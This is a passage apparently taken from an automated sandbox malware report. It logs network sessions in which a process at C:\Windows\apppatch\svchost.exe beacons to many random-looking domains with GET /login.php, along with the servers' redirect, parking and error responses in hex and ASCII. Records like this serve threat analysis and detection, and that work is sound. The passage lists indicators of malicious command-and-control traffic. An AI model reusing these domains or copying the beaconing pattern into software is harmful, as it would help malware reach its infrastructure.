                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          42192.168.2.957341162.255.119.102801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.352837086 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gahyqah.com
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.076623917 CEST303INHTTP/1.1 302 Found
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:53 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Content-Length: 55
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: http://www.gahyqah.com/login.php
                                                                                                                                                                                                          X-Served-By: Namecheap URL Forward
                                                                                                                                                                                                          Server: namecheap-nginx
                                                                                                                                                                                                          Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 61 68 79 71 61 68 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                          Data Ascii: <a href='http://www.gahyqah.com/login.php'>Found</a>.


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          43192.168.2.95734291.195.240.19801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.368252993 CEST271OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: www.gahyqah.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036604881 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                          date: Sun, 08 Sep 2024 08:53:53 GMT
                                                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                                                          transfer-encoding: chunked
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                          cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                          pragma: no-cache
                                                                                                                                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==
                                                                                                                                                                                                          last-modified: Sun, 08 Sep 2024 08:53:53 GMT
                                                                                                                                                                                                          x-cache-miss-from: parking-7768d5b45d-rblrk
                                                                                                                                                                                                          server: Parking/1.0
                                                                                                                                                                                                          Data Raw: 32 45 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 67 35 72 6c 58 73 39 52 75 52 57 34 64 67 6c 71 51 35 4c 79 64 4a 45 74 74 53 54 56 42 73 66 70 54 67 35 59 62 54 62 54 67 78 51 79 43 78 4a 61 58 2f 34 77 57 7a 74 49 41 4f 75 52 6c 32 79 56 59 68 58 30 57 47 46 31 59 61 65 77 33 55 38 35 6e 47 49 35 75 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 67 61 68 79 71 61 68 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 67 61 68 79 71 61 68 20 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: 2E2<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==><head><meta charset="utf-8"><title>gahyqah.com&nbsp;-&nbsp;gahyqah Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="gahyqah.com is your first and best source for all of the information youre looking for. From g
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036645889 CEST1236INData Raw: 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 67 61 68 79 71 61 68 2e 63 6f 6d 20 68 61 73 20 69 74 20 61 6c
                                                                                                                                                                                                          Data Ascii: eneral topics to more of what you would expect to find here, gahyqah.com has it all. We hope you find what you are searching for!"><link1062 rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/se
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036658049 CEST1236INData Raw: 67 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 73 76 67 3a 6e 6f 74 28 3a 72 6f 6f 74 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65
                                                                                                                                                                                                          Data Ascii: g{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036683083 CEST1236INData Raw: 73 74 2d 69 74 65 6d 7d 63 61 6e 76 61 73 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 74 65 6d 70 6c 61 74 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 5b 68 69 64 64 65 6e 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 61
                                                                                                                                                                                                          Data Ascii: st-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036695004 CEST1236INData Raw: 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72 20 61 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65
                                                                                                                                                                                                          Data Ascii: ontainer-disclaimer a{color:#949494}.container-imprint{text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036708117 CEST1236INData Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6c 61 72 67 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 20 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 7b 70 6f 73 69
                                                                                                                                                                                                          Data Ascii: ;font-size:larger}.container-cookie-message a{color:#fff}.cookie-modal-window{position:fixed;background-color:rgba(200,200,200,.75);top:0;right:0;bottom:0;left:0;-webkit-transition:all .3s;-moz-transition:all .3s;transition:all .3s;text-align:
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036721945 CEST1236INData Raw: 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 62 74 6e 2d 2d 73 75 63 63 65 73 73 2d 73 6d 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 61 36 62 32 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 31 61 36
                                                                                                                                                                                                          Data Ascii: ont-size:initial}.btn--success-sm:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:initial}.btn--secondary{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:medium}.btn--secondary:hover{background-color
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036736012 CEST1236INData Raw: 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 65 31 36 32 65 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 56 65 72 64 61 6e 61 2c 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 73 61 6e
                                                                                                                                                                                                          Data Ascii: y{background-color:#0e162e;font-family:Arial,Helvetica,Verdana,"Lucida Grande",sans-serif}body.cookie-message-enabled{padding-bottom:300px}.container-footer{padding-top:20px;padding-left:5%;padding-right:5%;padding-bottom:10px}.container-conte
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036748886 CEST1236INData Raw: 3a 73 63 61 6c 65 58 28 2d 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 7a 2d 69 6e 64 65 78 3a 2d 31 3b 74 6f 70 3a 35 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 69 6e 68 65 72 69 74 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63
                                                                                                                                                                                                          Data Ascii: :scaleX(-1);transform:scaleX(-1);z-index:-1;top:50px;position:inherit}.container-content--lp{min-height:720px}.container-content--rp{min-height:820px}.container-content--rp .container-content__right,.container-content--rp .container-content__l
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036762953 CEST1236INData Raw: 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 74 65 78 74 2d 64 65 63 6f 72 61
                                                                                                                                                                                                          Data Ascii: __list-element-link:link,.two-tier-ads-list__list-element-link:visited{text-decoration:underline}.two-tier-ads-list__list-element-link:hover,.two-tier-ads-list__list-element-link:active,.two-tier-ads-list__list-element-link:focus{text-decorati
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.041578054 CEST1236INData Raw: 38 38 7d 0a 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 76 61 72 20 64 74 6f 20 3d 20 7b 22 75 69 4f 70 74 69 6d 69 7a 65 22 3a 66
                                                                                                                                                                                                          Data Ascii: 88} </style><script type="text/javascript"> var dto = {"uiOptimize":false,"singleDomainName":"gahyqah.com","domainName":"gahyqah.com","domainPrice":0,"domainCurrency":"","adultFlag":false,"pu":"//www.gahyqah.com","dnsh":true,"dpsh


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          44192.168.2.957345199.191.50.83801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:54:00.285054922 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: galyqaz.com


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          45192.168.2.9573463.64.163.50801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:54:00.285218954 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: puzylyp.com
                                                                                                                                                                                                          Sep 8, 2024 10:54:03.917979002 CEST689INHTTP/1.1 410 Gone
                                                                                                                                                                                                          Server: openresty
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:54:03 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 542
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 30 20 47 6f 6e 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 30 20 47 6f 6e 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          46192.168.2.957347188.114.96.3801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:54:04.384114981 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyvan.com
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.108606100 CEST791INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:54:05 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://lysyvan.com/login.php
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w1EuiOZCqge%2Bj%2Fa6mAb1P6l%2BnJ1X8wl9bM0nxEGacgUNrmhZm0K8RGaaNvX3eNwHvA9350WALNpqGiube59fH3HXBwtjtkNPeG5IMhfYo6oOiXEORa38tVkexb2HNQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8bfdb637ff7f438e-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                          Sep 8, 2024 10:54:07.387229919 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyvan.com
                                                                                                                                                                                                          Sep 8, 2024 10:54:07.728256941 CEST620INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:54:07 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://lysyvan.com/login.php
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5DgONK7fSi9uaQs4psh4VGtJ56ODpyDpA9p9syCd0rr%2BHH96xYt4fXk3%2BHhe6hpNrfaK1q5gGsZTd5uwTaORcBy7BAtx6DkxtM7FF3RCo043pGE4YF7hOmscs%2FmD%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8bfdb6487871438e-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          Sep 8, 2024 10:54:07.819145918 CEST173INData Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          47192.168.2.957348103.150.11.230801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.038834095 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyrysor.com
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.958220005 CEST403INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                          Server: openresty/1.15.8.1
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:54:05 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 151
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: http://106.15.36.143:8001/dh/147287063_414682.html#index8?d=lyrysor.com
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
                                                                                                                                                                                                          Sep 8, 2024 10:54:11.619841099 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyrysor.com
                                                                                                                                                                                                          Sep 8, 2024 10:54:11.965871096 CEST403INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                          Server: openresty/1.15.8.1
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:54:11 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 151
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: http://106.15.36.143:8001/dh/147287063_414682.html#index8?d=lyrysor.com
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          48192.168.2.957349106.15.36.14380011512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:54:06.185220003 CEST289OUTGET /dh/147287063_414682.html HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: 106.15.36.143:8001
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Sep 8, 2024 10:54:11.616518974 CEST722INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: openresty/1.21.4.3
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:54:11 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 561
                                                                                                                                                                                                          Connection: keep-alive
